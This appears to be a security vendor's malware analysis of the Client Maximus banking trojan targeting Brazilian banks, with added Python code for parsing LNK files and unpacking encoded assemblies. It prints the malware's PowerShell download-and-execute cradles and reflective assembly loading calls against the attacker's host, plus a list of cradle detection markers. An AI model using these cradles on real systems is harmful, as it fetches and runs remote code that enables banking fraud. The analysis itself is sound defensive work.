In January 2017, IBM X-Force research reported the development of a new remote-access malware code targeting Brazilian banks. The malware, dubbed Client Maximus, was observed in ongoing campaigns and continues to target online banking users in the country. The development of Client Maximus, which is believed to be commercially available in Brazilian fraud and cybercrime communities, continues as new variants of the malware emerge.

IBM X-Force recently analyzed a new and upgraded version of the malware. Client Maximus appears to have been written specifically for attacks against Brazilian banks. Analysis of the different components of this code gave our researchers an overall picture of the growing sophistication of cybercrime tools in Brazil.

Read the white paper: Shifting the balance of power with cognitive fraud prevention

Initial Malware Download

The initial infection routine begins with an obfuscated LNK file that runs CMD.exe /c with PowerShell.exe as a parameter. PowerShell, in turn, gets its own parameter, a Base64-encoded script, which is immediately executed before it downloads another file from the attacker’s control server and executes it.

An interesting note about the initial LNK file used by Client Maximus is that the complete Base64-encoded PowerShell script is not visible in the Windows user interface, even when clicking “Properties” on the file. It is only visible with a dedicated ShellLink parser or a hex editor.

We decoded the PowerShell code from its Base64 format and received the following:

CleAr-HoST;iEX(NEW-oBjEcT nET.webClIEnT).DoWnLOaDSTRiNg('hxxps://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8MHVvRA%3D%3D%')

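As an added example (not code from the original post or from IBM X-Force), the following Python reader pulls the COMMAND_LINE_ARGUMENTS string straight out of the ShellLink structure, which is why the full script is visible here but not in the Properties dialog, decodes the Base64 script and case-folds it before matching download-cradle markers. It assumes the script is passed with -EncodedCommand (which PowerShell decodes as UTF-16LE); the .lnk bytes and the benign script are constructed for the test, and only the page's own decoded one-liner, with its URL shortened, is used for the indicator match.

```python
import base64, re, struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # 00021401-0000-0000-C000-000000000046
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData sections follow the header in this fixed order, each present only if its LinkFlags bit is set
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]
CRADLE_MARKERS = ("net.webclient", "downloadstring", "downloaddata", "iex",
                  "invoke-expression", "reflection.assembly]::load")

def parse_lnk(data):
    """Minimal MS-SHLLINK reader: returns the StringData fields, including COMMAND_LINE_ARGUMENTS."""
    if len(data) < 76 or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a ShellLink file")
    flags, pos = struct.unpack_from("<I", data, 20)[0], 76
    if flags & HAS_IDLIST:    # skip LinkTargetIDList (IDListSize + items)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:  # skip LinkInfo (its first DWORD is its own size)
        pos += struct.unpack_from("<I", data, pos)[0]
    fields, width = {}, (2 if flags & IS_UNICODE else 1)
    for bit, name in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no terminator
            raw = data[pos + 2:pos + 2 + count * width]
            fields[name] = raw.decode("utf-16-le" if width == 2 else "latin-1")
            pos += 2 + count * width
    return fields

def decode_encoded_command(args):
    """Recover the script behind -EncodedCommand (-e/-ec/-enc...): Base64 of UTF-16LE text."""
    m = re.search(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", args, re.IGNORECASE)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None

def cradle_indicators(script):
    """Case-fold first so random capitalisation (iEX, nET.webClIEnT) cannot hide the cradle."""
    lowered = script.lower()
    return [marker for marker in CRADLE_MARKERS if marker in lowered]

def build_sample_lnk(script):
    """Constructed test file (not a real Client Maximus sample) laid out like the one described above."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode()
    flags = 0x08 | 0x20 | IS_UNICODE  # HasRelativePath | HasArguments | IsUnicode
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags) + bytes(76 - 24)  # remaining header fields zeroed
    sd = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + sd(r"..\..\Windows\System32\cmd.exe") + sd("/c powershell.exe -EncodedCommand " + b64)

BENIGN_SCRIPT = "Write-Output 'constructed sample'"   # what the constructed test .lnk carries
# The page's decoded one-liner (URL shortened), used only to show the indicator match
PAGE_ONE_LINER = "CleAr-HoST;iEX(NEW-oBjEcT nET.webClIEnT).DoWnLOaDSTRiNg('hxxps://1361227624.rsc.cdn77.org/v2/gl.php')"
```

For a real file, pass the bytes read from the suspicious .lnk to parse_lnk and feed fields['arguments'] to decode_encoded_command.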

The resulting downloaded file is yet another obfuscated PowerShell script that fetches a .NET assembly named “Loader.” That element is dynamically loaded as follows:

$bytes = (New-Object Net.WebClient).DownloadData('hxxps://1361227624.rsc.cdn77.org/v2/loader.dll')
[Reflection.Assembly]::Load($bytes)


The next step is the execution of what the malware’s developer named a “Go” method on the dynamically loaded assembly (see Figure 1):

[Loader]::Go("hxxps://1361227624.rsc.cdn77.org/v2/", "CpWY")


The “Go” method performs the following checks and actions on the environment as a means to evade discovery by unwanted parties and anti-malware tools:

  • Checks whether the machine’s IP address falls inside the Brazilian IP range;
  • Scans for the presence of a number of security applications on the endpoint;
  • Creates random names for the files and folders it is about to create; and
  • Downloads the corresponding payload from the control server to match either a 32-bit or a 64-bit Windows machine.

After the loader’s run, the original PowerShell script proceeds to create two files:

  1. A VB script file that will execute the payload once it is downloaded; and
  2. A LNK file (shortcut) that executes the aforementioned VB script.

In the last step before the payload arrives, the PowerShell script executes the LNK file, which, in turn, executes the VBS file:

Start-Process $lnkFileName


The Client Maximus Four-Part Payload

The malware’s payload itself comprises four randomly named files. In the sample we analyzed, those files came up as:

File names vary between variants and machines, as the malware generates random names for them before creating the files. Let’s have a look at what these components do.

WindowsAnytimeUpgradeResults.exe.config

This file contains only the list of .NET runtimes supported by the executable that carries the same name; on its own it is of little value.

WindowsAnytimeUpgradeResults.exe

This file is a known .NET WinForm application used legitimately, usually by IT administrators, to encrypt and decrypt PowerShell scripts. WinForm, or Windows Forms, is a graphical class library included as a part of the Microsoft .NET Framework that provides a platform to write rich client applications for desktop, laptop and tablet PCs. This specific instance is known as PShellExec. In the context of the malware’s operation, it is used to decrypt the heavily obfuscated PowerShell script, noted as 2620343c, using the Zebra Bank Structure (ZBS) file as an argument.

To make debugging more arduous, the malware’s developer ensured that the runtime obfuscation of strings and some junk code is multi-threaded.

2620343c.zbs

ZBS files are typically used for data structure input/output. This file is, in reality, .NET-emitted code saved as a compressed byte array and encoded in Base64. This assembly, called Scripter.exe, is also quite heavily obfuscated and is loaded at runtime by the first executable using Assembly.Load(byte[]) and MethodInfo.Invoke().
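Added example, not code from the original post: a small triage helper that Base64-decodes a .zbs-style blob, inflates it and checks whether the result is shaped like a .NET assembly (PE header plus the CLR metadata “BSJB” signature). The page does not name the compression scheme the dropper used, so the usual .NET choices (gzip, zlib-wrapped and raw deflate) are tried in turn; the sample blob is constructed PE-shaped bytes, not a real assembly.

```python
import base64, gzip, zlib

# The page does not say which compression the dropper used, so the usual .NET choices
# (GZipStream, zlib-wrapped, raw DeflateStream) are tried in turn
DECOMPRESSORS = (
    ("gzip", gzip.decompress),
    ("zlib", zlib.decompress),
    ("raw-deflate", lambda b: zlib.decompress(b, -15)),
)

def unpack_zbs(blob):
    """Base64-decode a .zbs-style text blob and inflate it; returns (scheme, bytes) or None."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    for scheme, inflate in DECOMPRESSORS:
        try:
            return scheme, inflate(raw)
        except (OSError, zlib.error, EOFError):
            continue
    return None

def looks_like_dotnet_assembly(pe):
    """Cheap triage: 'MZ' stub, 'PE\\0\\0' at e_lfanew, and the 'BSJB' CLR metadata signature."""
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(pe[0x3C:0x40], "little")
    return pe[e_lfanew:e_lfanew + 4] == b"PE\0\0" and b"BSJB" in pe

def build_sample_zbs():
    """Constructed stand-in: PE-shaped bytes (not a real assembly), gzip-compressed and Base64-encoded."""
    fake = bytearray(b"MZ" + bytes(0x3E))
    fake[0x3C:0x40] = (0x80).to_bytes(4, "little")   # e_lfanew points at offset 0x80
    fake += bytes(0x80 - len(fake)) + b"PE\0\0" + bytes(64) + b"BSJB" + bytes(16)
    return base64.b64encode(gzip.compress(bytes(fake))).decode()
```

A positive result only says the blob unpacks to something PE-shaped with CLR metadata; the recovered bytes still need to be examined in a .NET decompiler.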

The output of WindowsAnytimeUpgradeResults.exe is an obfuscated PowerShell script that performs remote loading of a dynamic link library (DLL) into a remote process, effectively replacing the Windows loader. This technique, called reflective PE injection, is part of the PowerSploit suite, which offers various other features, such as logon token exfiltration and persistence techniques.

This final PowerShell code creates a new cmd.exe process and uses the DLL above to inject its payload into the legitimate cmd.exe process:

The following diagram gives an overview of the infection routine applied by this new variant of the Client Maximus banking malware:

Logical Attack Flow on the Victim’s Side

Once the endpoint has been successfully infected with the malware, Client Maximus will continually monitor the user’s browsing activity. When the user tries to reach his or her bank’s website — if that bank is on the malware operator’s target list — Client Maximus will go into action.

The malware’s top-level modus operandi is simple, yet effective:

  • Upon detecting a matching bank site/application, it launches full-screen overlay images to block the victim’s access to the banking session he or she initiated in the browser. Those screens also communicate fake messages to the victim, using social engineering to keep them waiting while the fraudster initiates a remote-access session to take control of the endpoint.
  • Client Maximus leverages remote control capabilities to take over the victim’s device, allowing the attacker to attempt a fraudulent transaction from that trusted endpoint. Moreover, for cases where the victim uses an application, rather than a website, for banking activity, the attacker can access that application on the desktop, see virtual keyboard activity and monitor the user’s actions in real time.

Client Maximus’ modus operandi is not much different from previous malicious code categorized under the remote overlay family. The scheme appears in further detail in our previous blog about Client Maximus.

Brazilian Malware Escalating in Sophistication

In 2017, IBM X-Force has been seeing an ongoing escalation of malware codes in Brazil. Our collaboration with external parties indicates that there has been a lasting step-up in the sophistication of these codes.

On top of frequently seeing new Client Maximus variants operated by different actors and the upgrade the malware has recently undergone, X-Force researchers also found a new code being propagated in Brazil. The code is named Vernon, and more information about the malware will be available in the coming week from IBM X-Force.

Banks wishing to protect their customers from evolving threats and cybercrime modus operandi are invited to learn more about IBM Trusteer advanced fraud protection.

Individuals looking for tips on protecting themselves from remote overlay malware and other banking Trojans are invited to read our tips page for staying safer on PC/mobile devices.

We worked with the following MD5 hashes for this blog:
